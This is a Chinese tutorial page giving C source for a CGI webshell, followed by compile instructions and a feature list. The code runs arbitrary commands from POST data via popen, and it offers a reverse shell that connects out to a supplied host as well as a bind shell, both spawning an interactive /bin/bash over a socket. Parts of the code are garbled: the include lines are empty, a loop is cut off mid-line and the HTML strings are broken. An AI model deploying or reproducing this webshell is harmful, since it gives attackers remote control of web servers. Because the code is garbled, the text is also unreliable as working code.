当前位置:Gxlcms > PHP教程 > LinuxC代码实现cgishell

LinuxC代码实现cgishell

时间:2021-07-01 10:21:17 帮助过:26人阅读

C语言实现cgi webshell

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
  
 
  
struct get_data {
    char key[100];
    char value[100];
};
  
  
void exec_cmd(void){
    printf("Content-type:text/html\n\n");
    FILE *command;
    int size = atoi(getenv("CONTENT_LENGTH"));
    if(size > 1500) {
        printf("Error> Post Data is very big");
        exit(0);
    }
    char *buffer = malloc(size+1);
    fread(buffer,1,size,stdin);
    command = popen(buffer,"r");
    char caracter;
  
    while((caracter = fgetc(command))){
        if(caracter == EOF) break;
        printf("%c",caracter);
    }
  
    pclose(command);
    free(buffer);
    exit(0);
}
  
int error(char *err){
    perror(err);
    exit(EXIT_FAILURE);
}
  
void parser_get(void){
    printf("Content-type:text/html\n\n");
  
    struct get_data *s;
    char *GET = (char *)getenv("QUERY_STRING");
    int i,number_of_get = 0,size_get = strlen(GET);
  
    if(strlen(GET) > 100)
        exit(0);
  
    s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  
    int element = 0;
    int positionA = 0;
    int positionB = 0;
    int id = 0;
  
    for(i=0;i 65535){
        printf("Something is wrong ... !!!");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
        printf("You must specify a target host ...");
        free(type_x);
        free(host_x);
        exit(0);
    }
  
    if(strcmp(type_x,"reverse") == 0){
        struct sockaddr_in addr;
        int msocket;
        msocket = socket(AF_INET,SOCK_STREAM,0);
  
        if(msocket < 0){
            printf("Fail to create socket");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port_x);
        addr.sin_addr.s_addr = inet_addr(host_x);
  
        memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  
        if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
            printf("Fail to connect\n");
            free(host_x);
            free(type_x);
            exit(0);
        }
  
        printf("Connect with sucess !!!\n");
  
        if(fork() == 0){
            close(0); close(1); close(2);
            dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
            execl("/bin/bash","bash","-i", (char *)0);
            close(msocket);
            exit(0);
        }
  
        free(host_x);
        free(type_x);
        exit(0);
    } else if (strcmp(type_x,"bind")==0) {
  
        int my_socket, cli_socket;
        struct sockaddr_in server_addr,cli_addr;
  
        if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
            printf("Fail to create socket");
            exit(1);
        }
  
        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(port_x);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);
  
        int optval = 1;
        setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  
  
        if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
            printf("Fail to bind");
            free(host_x);
            free(type_x);
            exit(1);
        }
  
        if (listen(my_socket, 1) < 0){
            printf("Fail to listen");
            free(host_x);
            free(type_x);
            exit(1);
        } else {
            printf("Listen on port %d\n",port_x);
        }
  
        if(fork() == 0){
            socklen_t tamanho = sizeof(struct sockaddr_in);
  
            if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
                exit(0);
  
            }
  
            close(0); close(1); close(2);
            dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  
            execl("/bin/bash","bash","-i",(char *)0);
            close(cli_socket);
  
        }
  
    }
    free(host_x);
    free(type_x);
    exit(0);
}
  
void load_css_js(void){
printf("\n\
\n\
");
  
}
  
int main(void){
    if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
    if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
    printf("Content-type:text/html\n\n");
  
    printf("\n");
    printf("\t\n\t\n");
    printf("\t\t C CGI SHELL =D \n");
    load_css_js();
    printf("\n\t\n");
    printf("\t\n");
printf(" \n\
    \n\
    

C - CGI SHELL

C0d3r: webshell | REVERSE/BIND
\n\ \n\ \n\
\n\ \n\ \n\ \n\
Reverse Connection: Stop
\n\
\n\
\n\ \n\ \n\
\n\
Bind Connection: Stop
\n\
\n\ \n\ \n\ \n\ \n\ \n\ \n\ "); return 0; }

编译:
gcc shell.c -o shell.cgi

功能:
1.反弹获得shell(target作为客户端)

1.jpg

2.监听获得shell(target作为服务端)

1.jpg

3.命令行执行

1.jpg

人气教程排行